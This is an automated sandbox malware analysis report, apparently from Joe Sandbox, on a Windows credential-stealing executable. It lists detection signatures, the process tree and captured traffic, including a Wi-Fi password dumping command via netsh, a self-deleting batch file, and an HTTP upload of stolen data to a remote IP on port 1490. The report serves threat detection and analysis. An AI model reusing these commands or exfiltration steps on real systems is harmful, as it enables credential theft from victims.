Edit tour

Windows Analysis Report
7fE6IkvYWf.exe

Overview

General Information

Sample name:	7fE6IkvYWf.exe
Analysis ID:	1569817
MD5:	2fe8c93d75210e538aec9062ba29c645
SHA1:	548954a0284ed9dd887fb1d39671289970aa5340
SHA256:	53c6ef3ed4d5b1758da8ed974af09901a9ef9d9c7e77e2af7b5194cd8214b4f9
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

PE file contains section with special chars

Queries memory information (via WMI often done to detect virtual machines)

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

7fE6IkvYWf.exe (PID: 4716 cmdline: "C:\Users\user\Desktop\7fE6IkvYWf.exe" MD5: 2FE8C93D75210E538AEC9062BA29C645)

cmd.exe (PID: 8128 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

tasklist.exe (PID: 1056 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

cmd.exe (PID: 7984 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 5212 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

netsh.exe (PID: 7980 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7464 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5464 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 3380 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

taskkill.exe (PID: 7880 cmdline: TaskKill /F /IM 4716 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7160 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 7660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2148 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: 7fE6IkvYWf.exe PID: 4716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7fE6IkvYWf.exe", ParentImage: C:\Users\user\Desktop\7fE6IkvYWf.exe, ParentProcessId: 4716, ParentProcessName: 7fE6IkvYWf.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 7984, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T10:33:32.706122+0100	2843856	1	A Network Trojan was detected	192.168.11.20	49714	89.23.100.233	1490	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7fE6IkvYWf.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 7fE6IkvYWf.exe

ReversingLabs: Detection: 44%

Machine Learning detection for sample

Source: 7fE6IkvYWf.exe

Joe Sandbox ML: detected

Source: 7fE6IkvYWf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata/ source: 7fE6IkvYWf.exe, 00000000.00000002.4884817050.00000000051C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.IO.Compression.pdbSystem.Core.dll$! source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Security.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.IO.Compression.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdbL source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.pdb4 source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdbH source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdataatawpr] source: 7fE6IkvYWf.exe, 00000000.00000002.4890691884.000000000A6F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSystem.Drawing.dll source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.pdbXdh source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49714 -> 89.23.100.233:1490

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 1490
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714

Source: global traffic

TCP traffic: 192.168.11.20:49714 -> 89.23.100.233:1490

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="7433006e-b941-4ad9-8a07-d2a3839ff4c0"Host: 89.23.100.233:1490Content-Length: 132873Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 89.23.100.233 89.23.100.233
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241

Source: Joe Sandbox View

ASN Name: MAXITEL-ASRU MAXITEL-ASRU

Source: unknown

DNS query: name: icanhazip.com

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 140.244.14.0.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="7433006e-b941-4ad9-8a07-d2a3839ff4c0"Host: 89.23.100.233:1490Content-Length: 132873Expect: 100-continueConnection: Keep-Alive

Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1490
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1490/uploadt
Source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.00000000703B1000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.16.dr	String found in binary or memory: http://upx.sf.net
Source: tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: tmpE39.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, tmpE39.tmp.dat.0.dr	String found in binary or memory: https://login.live.com//
Source: tmpE39.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, tmpE39.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/v104
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

PE file contains section with special chars

Source: 7fE6IkvYWf.exe	Static PE information: section name: .+,2
Source: 7fE6IkvYWf.exe	Static PE information: section name: .>h"

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923A28 NtClose,	0_2_02923A28
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029243D8 NtCreateSection,	0_2_029243D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924300 NtOpenFile,	0_2_02924300
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923EE0 NtProtectVirtualMemory,	0_2_02923EE0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924670 NtQueryVolumeInformationFile,	0_2_02924670
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923FB8 NtAllocateVirtualMemory,	0_2_02923FB8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924738 NtDeviceIoControlFile,	0_2_02924738
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924580 NtMapViewOfSection,	0_2_02924580
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029242F9 NtOpenFile,	0_2_029242F9
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923A21 NtClose,	0_2_02923A21
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029243D0 NtCreateSection,	0_2_029243D0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923EBF NtProtectVirtualMemory,	0_2_02923EBF
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924669 NtQueryVolumeInformationFile,	0_2_02924669
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923FB0 NtAllocateVirtualMemory,	0_2_02923FB0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924731 NtDeviceIoControlFile,	0_2_02924731
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924578 NtMapViewOfSection,	0_2_02924578

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Code function: 0_2_02924738: NtDeviceIoControlFile,

0_2_02924738

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB1098	0_2_00CB1098
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CBD800	0_2_00CBD800
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CBB258	0_2_00CBB258
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB9368	0_2_00CB9368
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB8D08	0_2_00CB8D08
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB96D0	0_2_00CB96D0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CBBF60	0_2_00CBBF60
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB1089	0_2_00CB1089
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CBB980	0_2_00CBB980
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB0A67	0_2_00CB0A67
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB9358	0_2_00CB9358
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB8D00	0_2_00CB8D00
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB9621	0_2_00CB9621
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB9E38	0_2_00CB9E38
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_00CB9F88	0_2_00CB9F88
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02921B10	0_2_02921B10
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0292E061	0_2_0292E061
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923180	0_2_02923180
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0292C978	0_2_0292C978
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02920648	0_2_02920648
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924FC0	0_2_02924FC0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02928778	0_2_02928778
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02925C90	0_2_02925C90
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0292F4A9	0_2_0292F4A9
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02922DF1	0_2_02922DF1
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029232E0	0_2_029232E0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02928A20	0_2_02928A20
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02924810	0_2_02924810
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0292F4A9	0_2_0292F4A9
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02925070	0_2_02925070
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02923171	0_2_02923171
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02920638	0_2_02920638
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029217B0	0_2_029217B0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02926C90	0_2_02926C90
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02927C70	0_2_02927C70
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_02927C60	0_2_02927C60
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05007D08	0_2_05007D08
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05006140	0_2_05006140
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500E980	0_2_0500E980
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500C428	0_2_0500C428
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05002068	0_2_05002068
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05002C80	0_2_05002C80
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500B4C0	0_2_0500B4C0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500A730	0_2_0500A730
